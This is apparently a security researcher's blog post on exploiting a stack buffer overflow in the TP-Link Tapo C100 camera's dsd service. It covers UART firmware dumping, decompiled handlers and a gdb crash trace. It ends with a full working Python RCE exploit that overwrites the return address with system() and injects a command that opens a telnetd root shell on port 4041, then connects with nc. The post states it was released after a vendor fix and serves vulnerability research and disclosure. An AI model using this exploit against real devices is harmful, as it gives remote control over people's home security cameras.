Note: This blogpost was written in November 2023, but I was waiting for the TP Link Security Team to release a fix so now it’s published(Jan 2024).

Hello world! and happy new year. It’s been a long time since I last posted here. I decided to take a new challenge, to do something I wanted to do since I was 15 years old(!) enthusiastic kid watching this Black Hat talk: hacking a Security Camera. 10 years later, I think it’s my turn now hehe

In this blogpost, I’ll share my journey of targeting the TP-Link Tapo C100 Home Security Camera. From extracting the firmware to spotting an n-day and writing a full RCE exploit.

Extracting the firmware

To get an initial foothold on the device, I soldered some cables to the UART pins of the device in hopes that I will get a bash shell.

board

My plan was to try a known technique used in other models of this camera: inserting an SD Card to the camera → copy /dev/mtdblock* files to the card → plug it to my laptop → run binwalk on it.

However, for some reason the camera did not manage to detect the SD Card ;_; so what I did was:

  1. Dumping the whole contents of the /dev/mtdblock* files with xxd(or, hexdump)
  2. Save all the UART output to a txt file
  3. Decode it back from hexdump to raw bytes

Yes, I dumped the whole firmware via UART, and it was so slow :) But desperate times call for desperate measures.

Intro to the “dsd” binary

The dsd binary, located at /usr/bin/dsd is one of the main components of the REST API the camera is exposing to the client. Basically, the uhttpd binary is using a local unix socket to send the user input to the dsd binary, perform the necessary action(change the camera settings, etc.) and return a response.

Spotting the bug

The bug exists in the check_user_info request handler.

The request:

{"user_management":{"check_user_info":{"username":"aaaa","password":"bbbb","encrypt_type":"2"}}, "method":"do"}

The handler:

undefined4 FUN_004288a4(int param_1,int param_2)
{
  int iVar1;
  char *__s;
  char *__s1;
  int iVar2;
  char *pcVar3;
  size_t sVar4;
  size_t sVar5;
  undefined4 uVar6;
  char acStack_80 [64];
  undefined4 local_40;
  undefined4 local_3c;
  undefined4 local_38;
  undefined4 local_34;
  int local_30;
  
  memset(acStack_80,0,0x40);
  local_40 = 0;
  local_3c = 0;
  local_38 = 0;
  local_34 = 0;
  if ((((param_1 == 0) || (param_2 == 0)) || (iVar1 = jso_is_obj(param_2), iVar1 == 0)) ||
     ((iVar1 = jso_obj_get_string_origin(param_2,"username"), iVar1 == 0 ||
      (__s = (char *)jso_obj_get_string_origin(param_2,"password"), __s == (char *)0x0)))) {
    uVar6 = 0xffff146f;
  }
  else {
    __s1 = (char *)jso_obj_get_string_origin(param_2,"encrypt_type");
    if (__s1 == (char *)0x0) {
      __s1 = "1";
    }
    printf("\t [dsd] %s(%d): ","check_user_info",0x59b);
    printf("encrypt_type:%s.",__s1);
    putchar(10);
    iVar2 = strcmp(__s1,"2");
    if (iVar2 == 0) {
      pcVar3 = (char *)FUN_0040e304(); // [1]
      sVar4 = strlen(__s);
      sVar5 = strlen(pcVar3);
      pcVar3 = (char *)private_decrypt(__s,sVar4,pcVar3,sVar5); // [2]
      printf("\t [dsd] %s(%d): ","check_user_info",0x5a1);
      printf("plaintext:%s.",pcVar3);
      putchar(10);
      if (pcVar3 != (char *)0x0) {
        local_30 = sscanf(pcVar3,"%[^:]:%[^:]",acStack_80,&local_40); // [3]
        printf("\t [dsd] %s(%d): ","check_user_info",0x5a5);
        printf("hashPswd(%s)  rsa_nonce(%s).",acStack_80,&local_40);
        putchar(10);
        if (local_30 == 2) {
          __s = acStack_80;
        }
        free(pcVar3);
      }
    }
    iVar2 = FUN_0040d1a0(param_1);
    if (iVar2 == 0) {
      iVar1 = FUN_0040d510(param_1,iVar1,__s);
      if (iVar1 == 0) {
        uVar6 = 0xffff622f;
      }
      else {
        iVar1 = strcmp(__s1,"2");
        uVar6 = 0;
        if ((iVar1 == 0) && (iVar1 = FUN_0040e15c(&local_40), iVar1 < 0)) {
          uVar6 = 0xffff6227;
        }
      }
    }
    else {
      uVar6 = 0xffff6229;
    }
  }
  return uVar6;
}

At [1], the RSA key is fetched and stored in pcVar3. Later, the user input is being decrypted at [2].

After decrypting the user input, the function uses sscanf to split the plaintext into two variables seperated with a : character(i.e: AAAA:BBBB).

The bug lays in the fact that private_decrypt(in libdecrypter.so) can decrypt up to 0x80 bytes:

void * private_decrypt(int param_1,int param_2,undefined4 param_3)
{
  int iVar1;
  BIO *bp;
  RSA *rsa;
  size_t __n;
  undefined4 uVar2;
  void *__dest;
  undefined auStack_918 [2048];
  uchar auStack_118 [128];
  uchar auStack_98 [120];
  int local_20 [3];
  /* ... more code ... */
  rsa = PEM_read_bio_RSAPrivateKey(bp,(RSA **)0x0,(undefined1 *)0x0,(void *)0x0);
  if (rsa == (RSA *)0x0) {
  /* ... more code ... */
  }
  local_20[0] = 0x80;
  /* ... more code ... */
  else {
    __n = RSA_private_decrypt(local_20[0],auStack_118,auStack_98,rsa,1);
    if ((int)__n < 0) {
      uVar2 = 0x1abc;
      goto LAB_00011588;
    }
  /* ... more code ... */
  __dest = calloc(0x75,1);
    if (__dest == (void *)0x0) {
      msglog(6,0x1a40,0x1b6c);
    }
    else {
      memcpy(__dest,auStack_98,__n);
      *(undefined *)((int)__dest + __n) = 0;
    }
  }
  RSA_free(rsa);
LAB_0001160c:
  BIO_free_all(bp);
  return __dest;
}

This can trigger a buffer overflow since the buffer size in libdecrypter.so can hold up to 128 bytes, but the stack buffer in the dsd binary can hold much less than that(we only need 60 bytes from the beginning of the buffer to reach the return address)

After doing some more googling of strings/constants I saw in the binary, I discovered that this bug was found in another model back in 2020: TL-IPC43AN-4(discovered by CataLpa) and was not fixed in my camera model(C100). His camera was a bit different: he had Web UI(we have access only Mobile App/API) and his camera was running ARM binaries(ours is MIPS) but it looks like these cameras were sharing the same dsd component/daemon. Moreover, I couldn’t find any other documentation of this bug(or exploit) so I guessed it might be one of those useless crashes that are not exploitable.

I decided to give it a shot anyway, with hope that maybe I’ll be the one who’ll write a full exploit for it.

So without further ado, let’s trigger the bug and examine the crash.

Triggering the bug

To trigger the bug, the following sequence of POST requests needs to sent to /stok=<YOUR_SID>/ds:

Request 1: Get the encryption key:

{
	"user_management":{
		"get_encrypt_info": {}
	},
	"method":"do"
}

Request #2: Encrypt the following payload with the key from the previous step:

QQQ:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC

Ciphertext:

pcV7TYekRREp49SYKlCbx2NU1+3A+y8y4a2VL4hPCvqZXATsU7DicFsauJWLEw/OB0uGe2ZcHrCzXTqhk0JoDXY6Rfv/IbWeOtqOMQkDh4e0VWCk0rEAo63KuaSdnRAneWOR5j1c0ig54gFoBblJ4kHz4a4OphX6kUJce0aDQRk=

Request #3: Send the encrypted result in the following manner:

{
	"user_management":{
		"check_user_info":{
			"username":"HelloWorld",
			"password":"ENCRYPTED_PAYLOAD_GOES_HERE",
			"encrypt_type":"2"
			}
		},
	"method":"do"
}

req2

Result:

Continuing.
         [dsd] check_user_info(1293): encrypt_type:2.
         [dsd] check_user_info(1299): plaintext:QQQ:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC.
         [dsd] check_user_info(1303): hashPswd(QQQ)  rsa_nonce(AAAAAAAAAAAAAAAA).

Thread 2 "dsd" received signal SIGBUS, Bus error.
[Switching to LWP 825]
0x42424242 in ?? ()

Nice :D

Exploiting the bug

Triggering a bug is one thing, exploiting it…well, that’s a whole engineering adventure.

Considering that fact that I have no experience with MIPS I found this very intimidating, but I’m always ready for a new challenge.

Exploiting this overflow can be trickey, because even though we can corrupt memory - we can’t enter a nullbyte(the %[^:] format specifier in the call to scanf() will stop after a nullbyte). So we can’t enter more than one address in order to craft a ROP/JOP chain on the stack. It requires us to find the perfect gadget: a gadget that will magically jump to system AND place an arbitrary string into the first argument.

After doing some more analysis, I found out that this primitive is ridiculously powerful and does not require any ROP/JOP chain. Because not only we control the ra register(which allows us to take control over the program’s execution) - THE VALUE OF THE a0 REGISTER POINTS TO A STRING FROM OUR HTTP REQUEST lol(the username field). So in other words: we don’t need to find the perfect gadget, it’s already there in our crash.

0x42424242 in ?? ()
(gdb) i r
          zero       at       v0       v1       a0       a1       a2       a3
 R0   00000000 10001c00 ffff622f 00000000 004ab739 00432685 00000000 7796bdb0
            t0       t1       t2       t3       t4       t5       t6       t7
 R8   00000000 00000000 31454630 32463132 39464233 46344443 46334442 00450000
            s0       s1       s2       s3       s4       s5       s6       s7
 R16  41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
            t8       t9       k0       k1       gp       sp       s8       ra
 R24  0044c930 779bb600 00000001 00000000 77bfd4c0 7796bef0 41414141 42424242
        status       lo       hi badvaddr    cause       pc
      00001c13 0d713e0e 00000008 42424242 40808010 42424242
          fcsr      fir  restart
      001c0004 00b70000 00000000
(gdb) x/s $a0
0x4ab739:       "elloWorld"

To exploit this bug all you need to do is craft the following request:

{
	"user_management":{
		"check_user_info":{
			"username":"//bin/echo 1337-1337-1337","
			password":"encrypted large buffer that will overflow",
			"encrypt_type":"2"
		}
	},
	"method":"do"
}

We don’t need another vulnerability to break ASLR because the binary was compiled without PIE, so all we need is jump straight to system@plt.

The full exploit is below, tested on firmware version 1.3.7:

#!/usr/bin/env python3
import requests
import urllib
from Crypto import Random
from Crypto.Hash import SHA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
from Crypto.Signature import PKCS1_v1_5 as Signature_pkcs1_v1_5
from Crypto.PublicKey import RSA
import base64
import pwn
import os
import ssl
from requests.adapters import HTTPAdapter
import urllib3
from urllib3.util import ssl_
from urllib3.poolmanager import PoolManager
 
# ==== [ignore this part, setup related class] ====
CIPHERS = "AES256-SHA"
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
class TlsAdapter(HTTPAdapter):
    def __init__(self, ssl_options=0, **kwargs):
        self.ssl_options = ssl_options
        super(TlsAdapter, self).__init__(**kwargs)
 
    def init_poolmanager(self, connections, maxsize, **pool_kwargs):
        ctx = ssl_.create_urllib3_context(
            ciphers=CIPHERS, cert_reqs=ssl.CERT_OPTIONAL, options=self.ssl_options
        )
        self.poolmanager = PoolManager(
            num_pools=connections, maxsize=maxsize, ssl_context=ctx, **pool_kwargs
        )
# ==== [/ignore this part, setup related class] ====
 
 
# ====================================
# EXPLOIT STARTS HERE
# ====================================
# Tested on Tapo C100 firmware version 1.3.7
IP = '10.0.0.57' # device IP goes here  
HASHED_PWD = ''  # hashed password goes here
SYSTEM_PLT = 0x43c930 # address of system()
 
def send_req(ip, req_body, route='/'):
    sess = requests.session()
    sess.mount('https://', TlsAdapter())
    resp = sess.post(f'https://{ip}{route}', headers={'User-Agent': 'Tapo CameraClient Android'} ,json=req_body, verify=False, timeout=2)
    sess.close()
    return resp
    
 
def get_stok(ip, password):
    req_body = {"method":"login","params":{"hashed":True,"password":password,"username":"admin"}}
    resp = send_req(ip, req_body)
    if resp.status_code == 200:
        resp = resp.json()
        return resp['result']['stok']
    else:
        raise Exception('cannot get stok!')
 
 
def rsa_encrypt(key, p):
    rsakey = RSA.importKey(key)
    cipher = Cipher_pkcs1_v1_5.new(rsakey)
    cipher_text = base64.b64encode(cipher.encrypt(p))
    return cipher_text
 
def get_public_key(ip, stok):
    req_body = {"user_management":{"get_encrypt_info":{}},"method":"do"}
    resp = send_req(ip, req_body, route=f'/stok={stok}/ds')
    if resp.status_code == 200:
        resp = resp.json()
        return resp['key']
    else:
        raise Exception('Login failed!')
 
    
def exploit(target_host, stok):
    print('[*] Preparing payload...')
    public_key = "-----BEGIN PUBLIC KEY-----\n" + get_public_key(target_host, stok) + "\n-----END PUBLIC KEY-----"
    payload =  b"BBB:" + b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaa'
    payload = payload.replace(b'paaa', pwn.p32(SYSTEM_PLT))
    password = rsa_encrypt(public_key, payload)
    cmd = '//usr/sbin/telnetd -l /bin/sh -p 4041 & '
    req_body = {"user_management":{"check_user_info":{"username":cmd,"password":password.decode(),"encrypt_type":"2"}},"method":"do"}
    try:
        print('[*] popping a shell :^)')
        resp = send_req(target_host, req_body, route=f'/stok={stok}/ds')
    except Exception as e:
        print('[*] bof triggered successfully')
        pass
 
    print('[*] Connecting to the target device')
    os.system(f'nc {target_host} 4041')
 
 
# main 
print(f'[*] Attacking {IP}')
stok_val = get_stok(IP, HASHED_PWD)
exploit(IP, stok_val)

https://twitter.com/0x_shaq/status/1723384686569836640

tapo-exploit

Thanks for reading, I hope you enjoyed :^)